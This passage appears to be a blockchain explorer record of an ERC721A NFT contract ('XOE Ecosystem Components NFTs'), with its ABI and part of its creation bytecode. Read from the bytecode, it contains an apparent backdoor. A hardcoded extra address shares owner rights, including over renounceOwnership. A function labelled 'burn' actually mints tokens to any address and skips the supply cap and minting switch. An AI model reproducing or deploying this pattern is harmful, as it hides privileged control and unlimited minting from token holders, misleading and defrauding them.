[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060600160405280603681526020016200457860369139600a9081620000839190620004a5565b506010600b55611f40600c553480156200009c57600080fd5b506040518060400160405280601d81526020017f584f452045636f73797374656d20436f6d706f6e656e7473204e4654730000008152506040518060400160405280600481526020017f584f45430000000000000000000000000000000000000000000000000000000081525081600190816200011a9190620004a5565b5080600290816200012c9190620004a5565b5050506200014f620001436200015d60201b60201c565b6200016560201b60201c565b60016009819055506200058c565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620002ad57607f821691505b602082108103620002c357620002c262000265565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200032d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620002ee565b620003398683620002ee565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000386620003806200037a8462000351565b6200035b565b62000351565b9050919050565b6000819050919050565b620003a28362000365565b620003ba620003b1826200038d565b848454620002fb565b825550505050565b600090565b620003d1620003c2565b620003de81848462000397565b505050565b5b818110156200040657620003fa600082620003c7565b600181019050620003e4565b5050565b601f82111562000455576200041f81620002c9565b6200042a84620002de565b810160208510156200043a578190505b620004526200044985620002de565b830182620003e3565b50505b505050565b600082821c905092915050565b60006200047a600019846008026200045a565b1980831691505092915050565b600062000495838362000467565b9150826002028217905092915050565b620004b0826200022b565b67ffffffffffffffff811115620004cc57620004cb62000236565b5b620004d8825462000294565b620004e58282856200040a565b600060209050601f8311600181146200051d576000841562000508578287015190505b62000514858262000487565b86555062000584565b601f1984166200052d86620002c9565b60005b82811015620005575784890151825560018201915060208501945060208101905062000530565b8683101562000577578489015162000573601f89168262000467565b8355505b6001600288020188555050505b505050505050565b613fdc806200059c6000396000f3fe608060405234801561001057600080fd5b50600436106101a95760003560e01c80637d55094d116100f9578063b88d4fde11610097578063d5abeb0111610071578063d5abeb01146104a6578063e985e9c5146104c4578063f2fde38b146104f4578063f968adbe14610510576101a9565b8063b88d4fde1461043c578063c87b56dd14610458578063d123973014610488576101a9565b80639dc29fac116100d35780639dc29fac146103cc578063a0712d68146103e8578063a0bcfc7f14610404578063a22cb46514610420576101a9565b80637d55094d146103865780638da5cb5b1461039057806395d89b41146103ae576101a9565b80632f745c59116101665780636352211e116101405780636352211e146102fe5780636c0360eb1461032e57806370a082311461034c578063715018a61461037c576101a9565b80632f745c591461028257806342842e0e146102b25780634f6ccce7146102ce576101a9565b806301ffc9a7146101ae57806306fdde03146101de578063081812fc146101fc578063095ea7b31461022c57806318160ddd1461024857806323b872dd14610266575b600080fd5b6101c860048036038101906101c39190612789565b61052e565b6040516101d591906127d1565b60405180910390f35b6101e6610678565b6040516101f3919061287c565b60405180910390f35b610216600480360381019061021191906128d4565b61070a565b6040516102239190612942565b60405180910390f35b61024660048036038101906102419190612989565b61078f565b005b6102506108a7565b60405161025d91906129d8565b60405180910390f35b610280600480360381019061027b91906129f3565b6108b0565b005b61029c60048036038101906102979190612989565b6108c0565b6040516102a991906129d8565b60405180910390f35b6102cc60048036038101906102c791906129f3565b610ab0565b005b6102e860048036038101906102e391906128d4565b610ad0565b6040516102f591906129d8565b60405180910390f35b610318600480360381019061031391906128d4565b610b23565b6040516103259190612942565b60405180910390f35b610336610b39565b604051610343919061287c565b60405180910390f35b61036660048036038101906103619190612a46565b610bc7565b60405161037391906129d8565b60405180910390f35b610384610caf565b005b61038e610d96565b005b610398610e9d565b6040516103a59190612942565b60405180910390f35b6103b6610ec7565b6040516103c3919061287c565b60405180910390f35b6103e660048036038101906103e19190612989565b610f59565b005b61040260048036038101906103fd91906128d4565b611042565b005b61041e60048036038101906104199190612ba8565b61113a565b005b61043a60048036038101906104359190612c1d565b611228565b005b61045660048036038101906104519190612cfe565b6113a8565b005b610472600480360381019061046d91906128d4565b611404565b60405161047f919061287c565b60405180910390f35b6104906114b7565b60405161049d91906127d1565b60405180910390f35b6104ae6114ca565b6040516104bb91906129d8565b60405180910390f35b6104de60048036038101906104d99190612d81565b6114d0565b6040516104eb91906127d1565b60405180910390f35b61050e60048036038101906105099190612a46565b611564565b005b6105186116ba565b60405161052591906129d8565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105f957507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b8061066157507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106715750610670826116c0565b5b9050919050565b60606001805461068790612df0565b80601f01602080910402602001604051908101604052809291908181526020018280546106b390612df0565b80156107005780601f106106d557610100808354040283529160200191610700565b820191906000526020600020905b8154815290600101906020018083116106e357829003601f168201915b5050505050905090565b60006107158261172a565b610754576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074b90612e93565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b600061079a82610b23565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361080a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080190612f25565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610829611737565b73ffffffffffffffffffffffffffffffffffffffff161480610858575061085781610852611737565b6114d0565b5b610897576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088e90612fb7565b60405180910390fd5b6108a283838361173f565b505050565b60008054905090565b6108bb8383836117f1565b505050565b60006108cb83610bc7565b821061090c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090390613049565b60405180910390fd5b60006109166108a7565b905060008060005b83811015610a6e576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610a1057806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a6057868403610a57578195505050505050610aaa565b83806001019450505b50808060010191505061091e565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa1906130db565b60405180910390fd5b92915050565b610acb838383604051806020016040528060008152506113a8565b505050565b6000610ada6108a7565b8210610b1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b129061316d565b60405180910390fd5b819050919050565b6000610b2e82611d2f565b600001519050919050565b600a8054610b4690612df0565b80601f0160208091040260200160405190810160405280929190818152602001828054610b7290612df0565b8015610bbf5780601f10610b9457610100808354040283529160200191610bbf565b820191906000526020600020905b815481529060010190602001808311610ba257829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2e906131ff565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b610cb7611737565b73ffffffffffffffffffffffffffffffffffffffff16610cd5610e9d565b73ffffffffffffffffffffffffffffffffffffffff161480610d4b5750610cfa611737565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d819061326b565b60405180910390fd5b610d946000611ec9565b565b610d9e611737565b73ffffffffffffffffffffffffffffffffffffffff16610dbc610e9d565b73ffffffffffffffffffffffffffffffffffffffff161480610e325750610de1611737565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610e71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e689061326b565b60405180910390fd5b600d60009054906101000a900460ff1615600d60006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060028054610ed690612df0565b80601f0160208091040260200160405190810160405280929190818152602001828054610f0290612df0565b8015610f4f5780601f10610f2457610100808354040283529160200191610f4f565b820191906000526020600020905b815481529060010190602001808311610f3257829003601f168201915b5050505050905090565b610f61611737565b73ffffffffffffffffffffffffffffffffffffffff16610f7f610e9d565b73ffffffffffffffffffffffffffffffffffffffff161480610ff55750610fa4611737565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611034576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102b9061326b565b60405180910390fd5b61103e8282611f8f565b5050565b600d60009054906101000a900460ff16611091576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611088906132d7565b60405180910390fd5b600c548161109d6108a7565b6110a79190613326565b11156110e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110df906133a6565b60405180910390fd5b600b5481111561112d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112490613412565b60405180910390fd5b6111373382611f8f565b50565b611142611737565b73ffffffffffffffffffffffffffffffffffffffff16611160610e9d565b73ffffffffffffffffffffffffffffffffffffffff1614806111d65750611185611737565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611215576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120c9061326b565b60405180910390fd5b80600a908161122491906135de565b5050565b611230611737565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361129d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611294906136fc565b60405180910390fd5b80600660006112aa611737565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611357611737565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c318360405161139c91906127d1565b60405180910390a35050565b6113b38484846117f1565b6113bf84848484611fad565b6113fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f59061378e565b60405180910390fd5b50505050565b606061140f8261172a565b61144e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161144590613820565b60405180910390fd5b6000611458612134565b9050600081511161147857604051806020016040528060008152506114af565b8061148e6001856114899190613326565b6121c6565b60405160200161149f9291906138c8565b6040516020818303038152906040525b915050919050565b600d60009054906101000a900460ff1681565b600c5481565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b61156c611737565b73ffffffffffffffffffffffffffffffffffffffff1661158a610e9d565b73ffffffffffffffffffffffffffffffffffffffff16148061160057506115af611737565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61163f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116369061326b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036116ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a590613969565b60405180910390fd5b6116b781611ec9565b50565b600b5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b60006117fc82611d2f565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16611823611737565b73ffffffffffffffffffffffffffffffffffffffff16148061187f5750611848611737565b73ffffffffffffffffffffffffffffffffffffffff166118678461070a565b73ffffffffffffffffffffffffffffffffffffffff16145b8061189b575061189a8260000151611895611737565b6114d0565b5b9050806118dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d4906139fb565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff161461194f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194690613a8d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036119be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119b590613b1f565b60405180910390fd5b6119cb8585856001612326565b6119db600084846000015161173f565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603611cbf57611c1e8161172a565b15611cbe5782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4611d28858585600161232c565b5050505050565b611d376126e3565b611d408261172a565b611d7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d7690613bb1565b60405180910390fd5b60008290505b60008110611e88576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614611e79578092505050611ec4565b50808060019003915050611d85565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ebb90613c43565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b611fa9828260405180602001604052806000815250612332565b5050565b6000611fce8473ffffffffffffffffffffffffffffffffffffffff16612344565b15612127578373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611ff7611737565b8786866040518563ffffffff1660e01b81526004016120199493929190613cb8565b6020604051808303816000875af192505050801561205557506040513d601f19601f820116820180604052508101906120529190613d19565b60015b6120d7573d8060008114612085576040519150601f19603f3d011682016040523d82523d6000602084013e61208a565b606091505b5060008151036120cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120c69061378e565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161491505061212c565b600190505b949350505050565b6060600a805461214390612df0565b80601f016020809104026020016040519081016040528092919081815260200182805461216f90612df0565b80156121bc5780601f10612191576101008083540402835291602001916121bc565b820191906000526020600020905b81548152906001019060200180831161219f57829003601f168201915b5050505050905090565b60606000820361220d576040518060400160405280600181526020017f30000000000000000000000000000000000000000000000000000000000000008152509050612321565b600082905060005b6000821461223f57808061222890613d46565b915050600a826122389190613dbd565b9150612215565b60008167ffffffffffffffff81111561225b5761225a612a7d565b5b6040519080825280601f01601f19166020018201604052801561228d5781602001600182028036833780820191505090505b5090505b6000851461231a576001826122a69190613dee565b9150600a856122b59190613e22565b60306122c19190613326565b60f81b8183815181106122d7576122d6613e53565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856123139190613dbd565b9450612291565b8093505050505b919050565b50505050565b50505050565b61233f8383836001612367565b505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16036123dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123d390613ef4565b60405180910390fd5b6000840361241f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161241690613f86565b60405180910390fd5b61242c6000868387612326565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b858110156126c657818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a483156126b1576126716000888488611fad565b6126b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126a79061378e565b60405180910390fd5b5b818060010192505080806001019150506125fa565b5080600081905550506126dc600086838761232c565b5050505050565b6040518060400160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681525090565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b61276681612731565b811461277157600080fd5b50565b6000813590506127838161275d565b92915050565b60006020828403121561279f5761279e612727565b5b60006127ad84828501612774565b91505092915050565b60008115159050919050565b6127cb816127b6565b82525050565b60006020820190506127e660008301846127c2565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561282657808201518184015260208101905061280b565b60008484015250505050565b6000601f19601f8301169050919050565b600061284e826127ec565b61285881856127f7565b9350612868818560208601612808565b61287181612832565b840191505092915050565b600060208201905081810360008301526128968184612843565b905092915050565b6000819050919050565b6128b18161289e565b81146128bc57600080fd5b50565b6000813590506128ce816128a8565b92915050565b6000602082840312156128ea576128e9612727565b5b60006128f8848285016128bf565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061292c82612901565b9050919050565b61293c81612921565b82525050565b60006020820190506129576000830184612933565b92915050565b61296681612921565b811461297157600080fd5b50565b6000813590506129838161295d565b92915050565b600080604083850312156129a05761299f612727565b5b60006129ae85828601612974565b92505060206129bf858286016128bf565b9150509250929050565b6129d28161289e565b82525050565b60006020820190506129ed60008301846129c9565b92915050565b600080600060608486031215612a0c57612a0b612727565b5b6000612a1a86828701612974565b9350506020612a2b86828701612974565b9250506040612a3c868287016128bf565b9150509250925092565b600060208284031215612a5c57612a5b612727565b5b6000612a6a84828501612974565b91505092915050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b612ab582612832565b810181811067ffffffffffffffff82111715612ad457612ad3612a7d565b5b80604052505050565b6000612ae761271d565b9050612af38282612aac565b919050565b600067ffffffffffffffff821115612b1357612b12612a7d565b5b612b1c82612832565b9050602081019050919050565b82818337600083830152505050565b6000612b4b612b4684612af8565b612add565b905082815260208101848484011115612b6757612b66612a78565b5b612b72848285612b29565b509392505050565b600082601f830112612b8f57612b8e612a73565b5b8135612b9f848260208601612b38565b91505092915050565b600060208284031215612bbe57612bbd612727565b5b600082013567ffffffffffffffff811115612bdc57612bdb61272c565b5b612be884828501612b7a565b91505092915050565b612bfa816127b6565b8114612c0557600080fd5b50565b600081359050612c1781612bf1565b92915050565b60008060408385031215612c3457612c33612727565b5b6000612c4285828601612974565b9250506020612c5385828601612c08565b9150509250929050565b600067ffffffffffffffff821115612c7857612c77612a7d565b5b612c8182612832565b9050602081019050919050565b6000612ca1612c9c84612c5d565b612add565b905082815260208101848484011115612cbd57612cbc612a78565b5b612cc8848285612b29565b509392505050565b600082601f830112612ce557612ce4612a73565b5b8135612cf5848260208601612c8e565b91505092915050565b60008060008060808587031215612d1857612d17612727565b5b6000612d2687828801612974565b9450506020612d3787828801612974565b9350506040612d48878288016128bf565b925050606085013567ffffffffffffffff811115612d6957612d6861272c565b5b612d7587828801612cd0565b91505092959194509250565b60008060408385031215612d9857612d97612727565b5b6000612da685828601612974565b9250506020612db785828601612974565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612e0857607f821691505b602082108103612e1b57612e1a612dc1565b5b50919050565b7f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560008201527f78697374656e7420746f6b656e00000000000000000000000000000000000000602082015250565b6000612e7d602d836127f7565b9150612e8882612e21565b604082019050919050565b60006020820190508181036000830152612eac81612e70565b9050919050565b7f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60008201527f6572000000000000000000000000000000000000000000000000000000000000602082015250565b6000612f0f6022836127f7565b9150612f1a82612eb3565b604082019050919050565b60006020820190508181036000830152612f3e81612f02565b9050919050565b7f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60008201527f776e6572206e6f7220617070726f76656420666f7220616c6c00000000000000602082015250565b6000612fa16039836127f7565b9150612fac82612f45565b604082019050919050565b60006020820190508181036000830152612fd081612f94565b9050919050565b7f455243373231413a206f776e657220696e646578206f7574206f6620626f756e60008201527f6473000000000000000000000000000000000000000000000000000000000000602082015250565b60006130336022836127f7565b915061303e82612fd7565b604082019050919050565b6000602082019050818103600083015261306281613026565b9050919050565b7f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060008201527f6f776e657220627920696e646578000000000000000000000000000000000000602082015250565b60006130c5602e836127f756